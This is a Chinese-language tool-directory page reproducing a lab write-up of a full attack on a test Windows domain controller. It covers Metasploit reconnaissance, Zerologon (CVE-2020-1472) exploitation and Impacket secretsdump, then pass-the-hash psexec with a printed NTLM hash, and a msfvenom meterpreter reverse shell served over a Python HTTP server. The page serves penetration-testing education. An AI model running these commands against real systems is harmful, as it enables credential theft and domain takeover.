Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Domain-Controller-DC-Exploitation-with-Metasploit-Impacket — 端到端域控制器利用,使用Metasploit和Impacket:发现DC10,利用Zerologon (CVE-2020-1472),提取NTLM哈希,获得SYSTEM shell,并建立Meterpreter会话。 | Kitploit
工具/GitHubGitHub/nyambiblaise/domain-controller-dc-exploitation-with-metasploit-impacket
侦察漏洞利用框架Payload生成漏洞分析横向移动后渗透利用渗透测试学习与教育实验室与实践

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHubnyambiblaise/domain-controller-dc-exploitation-with-metasploit-impacket

Domain-Controller-DC-Exploitation-with-Metasploit-Impacket

端到端域控制器利用,使用Metasploit和Impacket:发现DC10,利用Zerologon (CVE-2020-1472),提取NTLM哈希,获得SYSTEM shell,并建立Meterpreter会话。

查看仓库
1711个月前尚未审核

使用Metasploit和Impacket进行域控制器(DC)漏洞利用

从端到端利用域控制器:发现DC10,利用Zerologon(CVE-2020-1472),提取NTLM哈希,获取SYSTEM shell,并建立Meterpreter会话。

执行摘要 本练习演示了针对一个存在CVE-2020-1472(Zerologon)漏洞的域控制器的完整、真实的攻击链。整个交互过程包括发现、服务信息收集、漏洞利用、凭据提取、横向移动和后利用验证。我成功获得了SYSTEM级别的访问权限,并通过结合Zerologon、Impacket secretsdump + 哈希传递以及msfvenom/meterpreter载荷,在DC上建立了一个持久的Meterpreter会话。在每个阶段都捕获了截图和命令产物作为证据。

实验概述: 模拟了对一个Windows域控制器的完整攻击链,使用了Metasploit和Impacket,包括发现、Zerologon、secretsdump、哈希传递以及受控的Meterpreter会话。

为什么对组织来说很重要: 因为DC控制整个域的认证、组策略和身份,一次入侵就能级联导致完全的业务中断、帐户接管、数据泄露、勒索软件部署和监管信任丧失。保护DC能够通过阻止攻击者将身份变成单点故障来保障正常运行时间、收入和声誉。

使用Metasploit + Impacket进行域控制器(DC)漏洞利用

场景

你在一个受控的实验室网络中拥有两台机器。一个系统是名为DC10的Windows域控制器,它承载核心AD服务。另一个系统是放置在同一个服务器子网中进行测试的Kali工作站。假设DC暴露了典型的域服务(例如,LDAP、Kerberos、SMB),并且可能存在已知漏洞。Kali主机预计用于侦察、漏洞利用、凭据访问、横向移动和后利用验证。任务是识别DC,确认域详细信息,使用适用的技术获得初始立足点,提取凭据材料以实现管理访问,然后通过远程shell和受管理的代理会话展示对DC的控制,同时适应任何环境限制,如已修补的服务、受限出口或端点防御。 DC: 10.1.16.1 Kali: 10.1.16.66

关键发现

  • 利用的关键漏洞:成功利用CVE-2020-1472(Zerologon)将DC机器帐户密码重置为空。
  • 凭据泄露:从DC提取了NTLM哈希(secretsdump),揭示了能够进行哈希传递的Administrator凭据。
  • 演示了完整的域控制:使用提取的哈希,在DC10上获得了SYSTEM shell(psexec),并运行了稳定的Meterpreter反向shell,确认了远程代码执行和持久性。
  • 暴露的服务:从攻击主机可以访问LDAP、Kerberos、SMB和相关RPC服务,支持发现和利用。
  • 攻击面风险:DC接受了允许机器帐户操作和远程载荷执行的远程操作。

1) 发现与范围确定

我使用了带有数据库支持的msfconsole,在MSF中运行了nmap扫描,导入了结果,并整理了主机和服务以确认DC10的暴露情况。

  • 启动带数据库支持的msfconsole,确认数据库连接。
  • 在msfconsole中对子网进行nmap扫描,并将结果导入MSF数据库。
  • 清理主机表,移除我的Kali IP。审查服务以发现可能的DC指示器。
  • 使用MSF的SYN端口扫描器,采用受限端口范围和全局线程来细化服务数据。
  • 对Windows主机进行SMB指纹识别,以丰富操作系统信息。
  • 确认10.1.16.1上的LDAP和Kerberos服务,并通过LDAP查询验证域名。
  • 决策:将10.1.16.1作为漏洞利用和凭据访问的DC重点。
Image Image Image

2) 服务信息收集与DC确认

我在MSF中进行了SYN端口扫描,对SMB进行了指纹识别,并确认了10.1.16.1上的LDAP和Kerberos。我查询了LDAP以获取域名。

Image Image Image Image Image ### SMB版本检查
  • 我在msfconsole中使用了SMB版本模块:auxiliary/scanner/smb/smb_version。
  • 使用hosts -R从主机表设置目标。
  • 获取了SMB方言和操作系统信息。
  • 结果:10.1.16.1显示了Windows Server信息,这与它作为域控制器相符。
Image Image Image Image Image

LDAP查询

  • 对于LDAP查询模块,我使用了auxiliary/gather/ldap_query。
  • 设置 rhosts 10.1.16.1 以直接访问DC10。
  • 运行它以拉取基本目录信息。
  • 结果:确认域名为“structureality”,并且DC上的LDAP正在响应。
Image Image Image Image

3) Zerologon漏洞利用(初始访问)

我针对DC10运行了auxiliary/admin/dcerpc/cve_2020_1472_zerologon,将机器帐户密码重置为空。

Image Image

4) 凭据访问(secretsdump)

使用Impacket,我从DC转储了NTLM哈希,并识别出了Administrator凭据以进行哈希传递。

impacket-secretsdump -just-dc-ntlm structureality/dc10\[email protected]

Image Image

5) 横向移动(psexec)

我使用哈希传递和psexec在DC10上获得了SYSTEM级别的shell,并验证了主机身份。

impacket-psexec structureality/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:dae57d78fec919471799ce0fae8236b9 如您所见,我已经位于C:\Windows\system32中。

Image Image

6) 后利用(Meterpreter)

我生成了一个reverse_tcp meterpreter载荷,通过HTTP托管它,下载到DC10,启动了一个处理程序,并执行了载荷以打开一个Meterpreter会话。

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.1.16.66 LPORT=4567 -f exe -o secretfile.exe

Image Image 我启动了一个基本的web服务器,以便目标系统能够轻松访问这个meterpreter可执行文件,使用命令:

python3 -m http.server 8080

Image 在目标机器上,我执行了meterpreter可执行文件(secret.exe) Image Image
下载工具